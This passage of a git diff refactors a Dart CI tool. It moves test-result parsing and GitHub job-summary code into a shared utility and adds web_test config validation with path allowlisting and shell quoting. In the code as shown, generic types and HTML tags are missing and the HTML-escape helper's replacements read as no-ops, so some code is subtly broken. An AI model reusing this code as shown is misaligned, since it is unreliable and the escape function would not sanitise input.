write the rich job summary - _writeTestJobSummary(results, exitCode, logDir); + writeTestJobSummary(results, exitCode, logDir); if (exitCode != 0) { Logger.error('Root tests failed with exit code $exitCode'); @@ -203,286 +204,11 @@ class TestCommand extends Command { } } -// ── NDJSON Parsing ──────────────────────────────────────────────────────────── - -/// A single test failure with its error, stack trace, and captured print output. -class _TestFailure { - final String name; - final String error; - final String stackTrace; - final String printOutput; - final int durationMs; - - _TestFailure({ - required this.name, - required this.error, - required this.stackTrace, - required this.printOutput, - required this.durationMs, - }); -} - -/// Parsed results from the NDJSON test results file. -class _TestResults { - int passed = 0; - int failed = 0; - int skipped = 0; - int totalDurationMs = 0; - final List<_TestFailure> failures = []; - bool parsed = false; -} - -/// Parse the NDJSON file produced by `--file-reporter json:`. -/// -/// Each line is a JSON object with a `type` field. We track: -/// - `testStart`: register test name + start time -/// - `testDone`: record result, compute duration -/// - `error`: capture error message + stack trace (accumulated per test) -/// - `print`: capture print output, attribute to testID -/// - `done`: overall total time -_TestResults _parseTestResultsJson(String jsonPath) { - final results = _TestResults(); - final file = File(jsonPath); - if (!file.existsSync()) { - Logger.warn('No JSON results file found at $jsonPath'); - return results; - } - - results.parsed = true; - - // Tracking maps keyed by testID - final testNames = {}; - final testStartTimes = {}; - final testErrors = {}; - final testStackTraces = {}; - final testPrints = {}; - - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; - try { - final event = jsonDecode(line) as Map; - final type = event['type'] as String?; - - switch (type) { - case 'testStart': - final test = event['test'] as Map?; - if (test == null) break; - final id = test['id'] as int?; - if (id == null) break; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - - case 'testDone': - final id = event['testID'] as int?; - if (id == null) break; - final resultStr = event['result'] as String?; - final hidden = event['hidden'] as bool? ?? false; - final skipped = event['skipped'] as bool? ?? false; - - // Skip synthetic/hidden entries (group-level loading events) - if (hidden) break; - - if (skipped) { - results.skipped++; - } else if (resultStr == 'success') { - results.passed++; - } else if (resultStr == 'failure' || resultStr == 'error') { - results.failed++; - final startTime = testStartTimes[id] ?? 0; - final endTime = event['time'] as int? ?? 0; - results.failures.add( - _TestFailure( - name: testNames[id] ?? 'unknown', - error: testErrors[id]?.toString() ?? '', - stackTrace: testStackTraces[id]?.toString() ?? '', - printOutput: testPrints[id]?.toString() ?? '', - durationMs: endTime - startTime, - ), - ); - } - - case 'error': - final id = event['testID'] as int?; - if (id == null) break; - // Accumulate multiple errors per test (e.g. test failure + tearDown exception) - testErrors.putIfAbsent(id, () => StringBuffer()); - if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); - testErrors[id]!.write(event['error'] as String? ?? ''); - testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); - testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); - - case 'print': - final id = event['testID'] as int?; - if (id == null) break; - final message = event['message'] as String? ?? ''; - testPrints.putIfAbsent(id, () => StringBuffer()); - testPrints[id]!.writeln(message); - - case 'done': - final time = event['time'] as int? ?? 0; - results.totalDurationMs = time; - } - } catch (e) { - // Skip malformed JSON lines but continue parsing the rest - Logger.warn('Skipping malformed JSON line: $e'); - } - } - - return results; -} - -// ── Job Summary ─────────────────────────────────────────────────────────────── - -/// Generate a rich GitHub Actions job summary from parsed test results. -void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { - final buf = StringBuffer(); - - // Determine platform identifier for the heading - final platformId = - Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; - - buf.writeln('## Test Results — $platformId'); - buf.writeln(); - - if (!results.parsed) { - // Fallback: no JSON file was produced (test binary crashed before writing) - final status = exitCode == 0 ? 'passed' : 'failed'; - final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; - buf.writeln('> [!$icon]'); - buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); - buf.writeln(); - buf.writeln('Check the expanded output in test logs for details.'); - buf.writeln(); - buf.writeln(_artifactLink(':package: View full test logs')); - _writeStepSummary(buf.toString()); - return; - } - - final total = results.passed + results.failed + results.skipped; - final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); - - // Status banner — alert box lines must all be prefixed with > - if (results.failed == 0) { - buf.writeln('> [!NOTE]'); - buf.writeln('> All $total tests passed in ${durationSec}s'); - } else { - buf.writeln('> [!CAUTION]'); - buf.writeln('> ${results.failed} of $total tests failed'); - } - buf.writeln(); - - // Summary table - buf.writeln('| Status | Count |'); - buf.writeln('|--------|------:|'); - buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); - buf.writeln('| :x: Failed | ${results.failed} |'); - buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); - buf.writeln('| **Total** | **$total** |'); - buf.writeln('| **Duration** | **${durationSec}s** |'); - buf.writeln(); - - // Failed test details - if (results.failures.isNotEmpty) { - buf.writeln('### Failed Tests'); - buf.writeln(); - - // Cap at 20 failures to avoid exceeding the 1 MiB summary limit - final displayFailures = results.failures.take(20).toList(); - for (final f in displayFailures) { - final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; - buf.writeln('
'); - buf.writeln(':x: ${_escapeHtml(f.name)}$durStr'); - buf.writeln(); - - if (f.error.isNotEmpty) { - // Truncate very long error messages - final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; - buf.writeln('**Error:**'); - final fence = _codeFence(error); - buf.writeln(fence); - buf.writeln(error); - buf.writeln(fence); - buf.writeln(); - } - - if (f.stackTrace.isNotEmpty) { - // Truncate very long stack traces - final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; - buf.writeln('**Stack Trace:**'); - final fence = _codeFence(stack); - buf.writeln(fence); - buf.writeln(stack); - buf.writeln(fence); - buf.writeln(); - } - - if (f.printOutput.isNotEmpty) { - final trimmed = f.printOutput.trimRight(); - final lineCount = trimmed.split('\n').length; - // Truncate captured output if it's very long - final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; - buf.writeln('**Captured Output ($lineCount lines):**'); - final fence = _codeFence(printPreview); - buf.writeln(fence); - buf.writeln(printPreview); - buf.writeln(fence); - buf.writeln(); - } - - buf.writeln('
'); - buf.writeln(); - } - - if (results.failures.length > 20) { - buf.writeln( - '_...and ${results.failures.length - 20} more failures. ' - 'See test logs artifact for full details._', - ); - buf.writeln(); - } - } - - // Artifact link - buf.writeln('---'); - buf.writeln(_artifactLink(':package: View full test logs')); - buf.writeln(); - - _writeStepSummary(buf.toString()); -} - -// ── Helpers ─────────────────────────────────────────────────────────────────── - /// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). /// No-op when running locally (env var not set). -void _writeStepSummary(String markdown) { +void _writeTestStepSummary(String markdown) { final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; if (summaryFile != null) { File(summaryFile).writeAsStringSync(markdown, mode: FileMode.append); } } - -/// Build a link to the current workflow run's artifacts page. -String _artifactLink([String label = 'View all artifacts']) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY']; - final runId = Platform.environment['GITHUB_RUN_ID']; - if (repo == null || runId == null) return ''; - return '[$label]($server/$repo/actions/runs/$runId)'; -} - -/// Escape HTML special characters for safe embedding in GitHub markdown. -String _escapeHtml(String input) { - return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); -} - -/// Choose a code fence delimiter that does not appear in [content]. -/// Starts with triple backticks and extends as needed. -String _codeFence(String content) { - var fence = '```'; - while (content.contains(fence)) { - fence += '`'; - } - return fence; -} diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 37a63b6..5f42793 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -6,6 +6,7 @@ import 'dart:io'; import '../triage/utils/run_context.dart'; import '../triage/utils/config.dart'; import 'options/manage_cicd_options.dart'; +import 'utils/test_results_util.dart'; // Re-export path constants from run_context for use throughout this file. // All CI artifacts live under .runtime_ci/ at the repo root: @@ -2221,7 +2222,7 @@ Future _runTest(String repoRoot) async { } // Parse the JSON results file for structured test data - final results = _parseTestResultsJson(jsonPath); + final results = parseTestResultsJson(jsonPath); // Write console output to log file as well (supplements shell-level tee) File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); @@ -2230,7 +2231,7 @@ Future _runTest(String repoRoot) async { } // Generate and write the rich job summary - _writeTestJobSummary(results, exitCode, logDir); + writeTestJobSummary(results, exitCode, logDir); if (exitCode != 0) { _error('Tests failed (exit code $exitCode)'); @@ -2239,266 +2240,6 @@ Future _runTest(String repoRoot) async { _success('All tests passed'); } -/// A single test failure with its error, stack trace, and captured print output. -class _TestFailure { - final String name; - final String error; - final String stackTrace; - final String printOutput; - final int durationMs; - - _TestFailure({ - required this.name, - required this.error, - required this.stackTrace, - required this.printOutput, - required this.durationMs, - }); -} - -/// Parsed results from the NDJSON test results file. -class _TestResults { - int passed = 0; - int failed = 0; - int skipped = 0; - int totalDurationMs = 0; - final List<_TestFailure> failures = []; - bool parsed = false; -} - -/// Parse the NDJSON file produced by `--file-reporter json:`. -/// -/// Each line is a JSON object with a `type` field. We track: -/// - `testStart`: register test name, start time, skip status -/// - `testDone`: record result, compute duration -/// - `error`: capture error message + stack trace -/// - `print`: capture print output, attribute to testID -/// - `done`: overall success/failure + total time -_TestResults _parseTestResultsJson(String jsonPath) { - final results = _TestResults(); - final file = File(jsonPath); - if (!file.existsSync()) { - _warn('No JSON results file found at $jsonPath'); - return results; - } - - results.parsed = true; - - // Tracking maps keyed by testID - final testNames = {}; - final testStartTimes = {}; - final testErrors = {}; - final testStackTraces = {}; - final testPrints = {}; - - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; - try { - final event = jsonDecode(line) as Map; - final type = event['type'] as String?; - - switch (type) { - case 'testStart': - final test = event['test'] as Map?; - if (test == null) break; - final id = test['id'] as int?; - if (id == null) break; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - - case 'testDone': - final id = event['testID'] as int?; - if (id == null) break; - final resultStr = event['result'] as String?; - final hidden = event['hidden'] as bool? ?? false; - final skipped = event['skipped'] as bool? ?? false; - - // Skip synthetic/hidden entries (group-level loading events) - if (hidden) break; - - if (skipped) { - results.skipped++; - } else if (resultStr == 'success') { - results.passed++; - } else if (resultStr == 'failure' || resultStr == 'error') { - results.failed++; - final startTime = testStartTimes[id] ?? 0; - final endTime = event['time'] as int? ?? 0; - results.failures.add( - _TestFailure( - name: testNames[id] ?? 'unknown', - error: testErrors[id]?.toString() ?? '', - stackTrace: testStackTraces[id]?.toString() ?? '', - printOutput: testPrints[id]?.toString() ?? '', - durationMs: endTime - startTime, - ), - ); - } - - case 'error': - final id = event['testID'] as int?; - if (id == null) break; - // Accumulate multiple errors per test (e.g. test failure + tearDown exception) - testErrors.putIfAbsent(id, () => StringBuffer()); - if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); - testErrors[id]!.write(event['error'] as String? ?? ''); - testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); - testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); - - case 'print': - final id = event['testID'] as int?; - if (id == null) break; - final message = event['message'] as String? ?? ''; - testPrints.putIfAbsent(id, () => StringBuffer()); - testPrints[id]!.writeln(message); - - case 'done': - final time = event['time'] as int? ?? 0; - results.totalDurationMs = time; - } - } catch (e) { - // Skip malformed JSON lines but continue parsing the rest - _warn('Skipping malformed JSON line: $e'); - } - } - - return results; -} - -/// Generate a rich GitHub Actions job summary from parsed test results. -void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { - final buf = StringBuffer(); - - // Determine platform identifier for the heading - final platformId = - Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; - - buf.writeln('## Test Results — $platformId'); - buf.writeln(); - - if (!results.parsed) { - // Fallback: no JSON file was produced (test binary crashed before writing) - final status = exitCode == 0 ? 'passed' : 'failed'; - final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; - buf.writeln('> [!$icon]'); - buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); - buf.writeln(); - buf.writeln('Check the expanded output in test logs for details.'); - buf.writeln(); - buf.writeln(_artifactLink(':package: View full test logs')); - _writeStepSummary(buf.toString()); - return; - } - - final total = results.passed + results.failed + results.skipped; - final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); - - // Status banner — alert box lines must all be prefixed with > - if (results.failed == 0) { - buf.writeln('> [!NOTE]'); - buf.writeln('> All $total tests passed in ${durationSec}s'); - } else { - buf.writeln('> [!CAUTION]'); - buf.writeln('> ${results.failed} of $total tests failed'); - } - buf.writeln(); - - // Summary table - buf.writeln('| Status | Count |'); - buf.writeln('|--------|------:|'); - buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); - buf.writeln('| :x: Failed | ${results.failed} |'); - buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); - buf.writeln('| **Total** | **$total** |'); - buf.writeln('| **Duration** | **${durationSec}s** |'); - buf.writeln(); - - // Failed test details - if (results.failures.isNotEmpty) { - buf.writeln('### Failed Tests'); - buf.writeln(); - - // Cap at 20 failures to avoid exceeding the 1 MiB summary limit - final displayFailures = results.failures.take(20).toList(); - for (final f in displayFailures) { - final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; - buf.writeln('
'); - buf.writeln(':x: ${_escapeHtml(f.name)}$durStr'); - buf.writeln(); - - if (f.error.isNotEmpty) { - // Truncate very long error messages - final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; - buf.writeln('**Error:**'); - final errorFence = _codeFence(error); - buf.writeln(errorFence); - buf.writeln(error); - buf.writeln(errorFence); - buf.writeln(); - } - - if (f.stackTrace.isNotEmpty) { - // Truncate very long stack traces - final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; - buf.writeln('**Stack Trace:**'); - final stackFence = _codeFence(stack); - buf.writeln(stackFence); - buf.writeln(stack); - buf.writeln(stackFence); - buf.writeln(); - } - - if (f.printOutput.isNotEmpty) { - final trimmed = f.printOutput.trimRight(); - final lineCount = trimmed.split('\n').length; - // Truncate captured output if it's very long - final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; - buf.writeln('**Captured Output ($lineCount lines):**'); - final printFence = _codeFence(printPreview); - buf.writeln(printFence); - buf.writeln(printPreview); - buf.writeln(printFence); - buf.writeln(); - } - - buf.writeln('
'); - buf.writeln(); - } - - if (results.failures.length > 20) { - buf.writeln( - '_...and ${results.failures.length - 20} more failures. ' - 'See test logs artifact for full details._', - ); - buf.writeln(); - } - } - - // Artifact link - buf.writeln('---'); - buf.writeln(_artifactLink(':package: View full test logs')); - buf.writeln(); - - _writeStepSummary(buf.toString()); -} - -/// Escape HTML special characters for safe embedding in GitHub markdown. -String _escapeHtml(String input) { - return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); -} - -/// Choose a code fence delimiter that does not appear in [content]. -/// Starts with triple backticks and extends as needed. -String _codeFence(String content) { - var fence = '```'; - while (content.contains(fence)) { - fence += '`'; - } - return fence; -} - /// Run dart analyze and fail only on actual errors. /// /// We run plain `dart analyze` (no --fatal-infos) and parse output ourselves. diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index a0975c0..20f3568 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -51,4 +51,9 @@ abstract final class StepSummary { final openAttr = open ? ' open' : ''; return '\n\n$title\n\n$content\n\n\n'; } + + /// Escape HTML special characters for safe embedding in GitHub markdown. + static String escapeHtml(String input) { + return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); + } } diff --git a/lib/src/cli/utils/test_results_util.dart b/lib/src/cli/utils/test_results_util.dart new file mode 100644 index 0000000..5259e0b --- /dev/null +++ b/lib/src/cli/utils/test_results_util.dart @@ -0,0 +1,262 @@ +import 'dart:convert'; +import 'dart:io'; + +import 'logger.dart'; +import 'step_summary.dart'; + +/// A single test failure with its error, stack trace, and captured print output. +class TestFailure { + final String name; + final String error; + final String stackTrace; + final String printOutput; + final int durationMs; + + TestFailure({ + required this.name, + required this.error, + required this.stackTrace, + required this.printOutput, + required this.durationMs, + }); +} + +/// Parsed results from the NDJSON test results file produced by `--file-reporter json:`. +class TestResults { + int passed = 0; + int failed = 0; + int skipped = 0; + int totalDurationMs = 0; + final List failures = []; + bool parsed = false; +} + +/// Parse the NDJSON file produced by `--file-reporter json:`. +/// +/// Each line is a JSON object with a `type` field. We track: +/// - `testStart`: register test name + start time +/// - `testDone`: record result, compute duration +/// - `error`: capture error message + stack trace (accumulated per test) +/// - `print`: capture print output, attribute to testID +/// - `done`: overall total time +TestResults parseTestResultsJson(String jsonPath) { + final results = TestResults(); + final file = File(jsonPath); + if (!file.existsSync()) { + Logger.warn('No JSON results file found at $jsonPath'); + return results; + } + + results.parsed = true; + + // Tracking maps keyed by testID + final testNames = {}; + final testStartTimes = {}; + final testErrors = {}; + final testStackTraces = {}; + final testPrints = {}; + + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + try { + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + // Skip synthetic/hidden entries (group-level loading events) + if (hidden) break; + + if (skipped) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + results.failures.add( + TestFailure( + name: testNames[id] ?? 'unknown', + error: testErrors[id]?.toString() ?? '', + stackTrace: testStackTraces[id]?.toString() ?? '', + printOutput: testPrints[id]?.toString() ?? '', + durationMs: endTime - startTime, + ), + ); + } + + case 'error': + final id = event['testID'] as int?; + if (id == null) break; + // Accumulate multiple errors per test (e.g. test failure + tearDown exception) + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? ''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); + + case 'print': + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } catch (e) { + // Skip malformed JSON lines but continue parsing the rest + Logger.warn('Skipping malformed JSON line: $e'); + } + } + + return results; +} + +/// Choose a code fence delimiter that does not appear in [content]. +String _codeFence(String content) { + var fence = '```'; + while (content.contains(fence)) { + fence += '`'; + } + return fence; +} + +/// Generate a rich GitHub Actions job summary from parsed test results. +/// +/// Writes to $GITHUB_STEP_SUMMARY when running in CI. Platform identifier +/// and failure names are HTML-escaped for safe embedding. +void writeTestJobSummary(TestResults results, int exitCode, String logDir) { + final buf = StringBuffer(); + + // Determine platform identifier for the heading (HTML-escaped for safe embedding) + final platformId = + Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; + + buf.writeln('## Test Results — ${StepSummary.escapeHtml(platformId)}'); + buf.writeln(); + + if (!results.parsed) { + // Fallback: no JSON file was produced (test binary crashed before writing) + final status = exitCode == 0 ? 'passed' : 'failed'; + final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; + buf.writeln('> [!$icon]'); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); + buf.writeln(); + buf.writeln('Check the expanded output in test logs for details.'); + buf.writeln(); + buf.writeln(StepSummary.artifactLink(':package: View full test logs')); + StepSummary.write(buf.toString()); + return; + } + + final total = results.passed + results.failed + results.skipped; + final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); + + // Status banner — alert box lines must all be prefixed with > + if (results.failed == 0) { + buf.writeln('> [!NOTE]'); + buf.writeln('> All $total tests passed in ${durationSec}s'); + } else { + buf.writeln('> [!CAUTION]'); + buf.writeln('> ${results.failed} of $total tests failed'); + } + buf.writeln(); + + // Summary table + buf.writeln('| Status | Count |'); + buf.writeln('|--------|------:|'); + buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); + buf.writeln('| :x: Failed | ${results.failed} |'); + buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); + buf.writeln('| **Total** | **$total** |'); + buf.writeln('| **Duration** | **${durationSec}s** |'); + buf.writeln(); + + // Failed test details + if (results.failures.isNotEmpty) { + buf.writeln('### Failed Tests'); + buf.writeln(); + + // Cap at 20 failures to avoid exceeding the 1 MiB summary limit + final displayFailures = results.failures.take(20).toList(); + for (final f in displayFailures) { + final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; + buf.writeln('
'); + buf.writeln(':x: ${StepSummary.escapeHtml(f.name)}$durStr'); + buf.writeln(); + + if (f.error.isNotEmpty) { + // Truncate very long error messages + final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; + buf.writeln('**Error:**'); + final fence = _codeFence(error); + buf.writeln(fence); + buf.writeln(error); + buf.writeln(fence); + buf.writeln(); + } + + if (f.stackTrace.isNotEmpty) { + // Truncate very long stack traces + final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; + buf.writeln('**Stack Trace:**'); + final fence = _codeFence(stack); + buf.writeln(fence); + buf.writeln(stack); + buf.writeln(fence); + buf.writeln(); + } + + if (f.printOutput.isNotEmpty) { + final trimmed = f.printOutput.trimRight(); + final lineCount = trimmed.split('\n').length; + // Truncate captured output if it's very long + final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; + buf.writeln('**Captured Output ($lineCount lines):**'); + final fence = _codeFence(printPreview); + buf.writeln(fence); + buf.writeln(printPreview); + buf.writeln(fence); + buf.writeln(); + } + + buf.writeln('
'); + buf.writeln(); + } + + if (results.failures.length > 20) { + buf.writeln( + '_...and ${results.failures.length - 20} more failures. ' + 'See test logs artifact for full details._', + ); + buf.writeln(); + } + } + + // Artifact link + buf.writeln('---'); + buf.writeln(StepSummary.artifactLink(':package: View full test logs')); + buf.writeln(); + + StepSummary.write(buf.toString()); +} diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index a39def2..5b8396f 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -55,6 +55,8 @@ const Set _knownFeatureKeys = { 'web_test', }; +const Set _knownWebTestKeys = {'concurrency', 'paths'}; + /// Renders CI workflow YAML from a Mustache skeleton template and config.json. /// /// The skeleton uses `<% %>` delimiters (set via `{{=<% %>=}}` at the top) @@ -71,6 +73,12 @@ class WorkflowGenerator { WorkflowGenerator({required this.ciConfig, required this.toolingVersion}); + /// Returns the web_test config map if present and valid; otherwise null. + static Map? _getWebTestConfig(Map ciConfig) { + final raw = ciConfig['web_test']; + return raw is Map ? raw : null; + } + /// Load the CI config section from a repo's config.json. /// /// Returns null if the config.json doesn't exist or has no `ci` section. @@ -96,7 +104,15 @@ class WorkflowGenerator { /// Render the CI workflow from the skeleton template. /// /// If [existingContent] is provided, user sections are preserved from it. + /// + /// Throws [StateError] if the config is invalid. Always validates before + /// rendering to prevent interpolation of unsafe values into shell commands. String render({String? existingContent}) { + final errors = validate(ciConfig); + if (errors.isNotEmpty) { + throw StateError('Cannot render with invalid config:\n ${errors.join('\n ')}'); + } + final skeletonPath = TemplateResolver.resolveTemplatePath('github/workflows/ci.skeleton.yaml'); final skeletonFile = File(skeletonPath); if (!skeletonFile.existsSync()) { @@ -180,10 +196,10 @@ class WorkflowGenerator { 'build_runner': features['build_runner'] == true, 'web_test': features['web_test'] == true, - // Web test config (only meaningful when web_test is true) - 'web_test_concurrency': _resolveWebTestConcurrency(ciConfig), - 'web_test_paths': _resolveWebTestPaths(ciConfig), - 'web_test_has_paths': _resolveWebTestHasPaths(ciConfig), + // Web test config (only computed when web_test is true) + 'web_test_concurrency': features['web_test'] == true ? _resolveWebTestConcurrency(ciConfig) : '1', + 'web_test_paths': features['web_test'] == true ? _resolveWebTestPaths(ciConfig) : '', + 'web_test_has_paths': features['web_test'] == true && _resolveWebTestHasPaths(ciConfig), // Secrets / env 'has_secrets': secretsList.isNotEmpty, @@ -205,36 +221,38 @@ class WorkflowGenerator { } static String _resolveWebTestConcurrency(Map ciConfig) { - final webTestConfig = ciConfig['web_test']; - if (webTestConfig is Map) { + final webTestConfig = _getWebTestConfig(ciConfig); + if (webTestConfig != null) { final concurrency = webTestConfig['concurrency']; - if (concurrency is int && concurrency > 0) { + if (concurrency is int && concurrency > 0 && concurrency <= 32) { return '$concurrency'; } } return '1'; } - static String _resolveWebTestPaths(Map ciConfig) { - final webTestConfig = ciConfig['web_test']; - if (webTestConfig is Map) { + /// Shared filter: extracts valid, normalized web test paths from config. + static List _filteredWebTestPaths(Map ciConfig) { + final webTestConfig = _getWebTestConfig(ciConfig); + if (webTestConfig != null) { final paths = webTestConfig['paths']; if (paths is List && paths.isNotEmpty) { - return paths.whereType().where((s) => s.trim().isNotEmpty).join(' '); + return paths.whereType().where((s) => s.trim().isNotEmpty).map((s) => p.posix.normalize(s)).toList(); } } - return ''; + return const []; + } + + static String _resolveWebTestPaths(Map ciConfig) { + final filtered = _filteredWebTestPaths(ciConfig); + if (filtered.isEmpty) return ''; + // Shell-quote each path for defense-in-depth (validation already blocks + // dangerous characters, but quoting prevents breakage from future changes). + return filtered.map((s) => "'$s'").join(' '); } static bool _resolveWebTestHasPaths(Map ciConfig) { - final webTestConfig = ciConfig['web_test']; - if (webTestConfig is Map) { - final paths = webTestConfig['paths']; - if (paths is List && paths.isNotEmpty) { - return paths.whereType().where((s) => s.trim().isNotEmpty).isNotEmpty; - } - } - return false; + return _filteredWebTestPaths(ciConfig).isNotEmpty; } /// Extract user sections from the existing file and re-insert them @@ -437,12 +455,19 @@ class WorkflowGenerator { if (webTestConfig is! Map) { errors.add('ci.web_test must be an object, got ${webTestConfig.runtimeType}'); } else { + // Detect unknown keys inside web_test config + for (final key in webTestConfig.keys) { + if (key is String && !_knownWebTestKeys.contains(key)) { + errors.add('ci.web_test contains unknown key "$key" (typo?)'); + } + } + final concurrency = webTestConfig['concurrency']; if (concurrency != null) { if (concurrency is! int) { errors.add('ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}'); - } else if (concurrency < 1) { - errors.add('ci.web_test.concurrency must be a positive integer, got $concurrency'); + } else if (concurrency < 1 || concurrency > 32) { + errors.add('ci.web_test.concurrency must be between 1 and 32, got $concurrency'); } } @@ -451,6 +476,7 @@ class WorkflowGenerator { if (paths is! List) { errors.add('ci.web_test.paths must be an array, got ${paths.runtimeType}'); } else { + final seenPaths = {}; for (var i = 0; i < paths.length; i++) { final pathValue = paths[i]; if (pathValue is! String || pathValue.trim().isEmpty) { @@ -480,6 +506,10 @@ class WorkflowGenerator { } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { errors.add('ci.web_test.paths[$i] contains unsupported characters: "$pathValue"'); + continue; + } + if (!seenPaths.add(normalized)) { + errors.add('ci.web_test.paths contains duplicate path "$normalized"'); } } } @@ -487,6 +517,16 @@ class WorkflowGenerator { } } + // Cross-validate: both mismatch directions + // Direction 1: config present but feature disabled (below) + // Direction 2: feature enabled but config wrong type — handled by web_test block above + if (features is Map) { + final webTestEnabled = features['web_test'] == true; + if (!webTestEnabled && webTestConfig is Map && webTestConfig.isNotEmpty) { + errors.add('ci.web_test config is present but ci.features.web_test is not enabled (dead config?)'); + } + } + return errors; } @@ -510,9 +550,10 @@ class WorkflowGenerator { } if (features['web_test'] == true) { - final webTestConfig = ciConfig['web_test'] as Map? ?? {}; - final concurrency = webTestConfig['concurrency'] ?? 1; - final webPaths = webTestConfig['paths'] as List? ?? []; + final wtConfig = ciConfig['web_test']; + final wtMap = wtConfig is Map ? wtConfig : {}; + final concurrency = wtMap['concurrency'] is int ? wtMap['concurrency'] : 1; + final webPaths = wtMap['paths'] is List ? wtMap['paths'] as List : []; Logger.info(' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? "(all)" : webPaths.join(", ")}'); } diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index b5af516..b210259 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -461,6 +461,7 @@ jobs: <%/secrets_list%> <%/has_secrets%> steps: + # ── 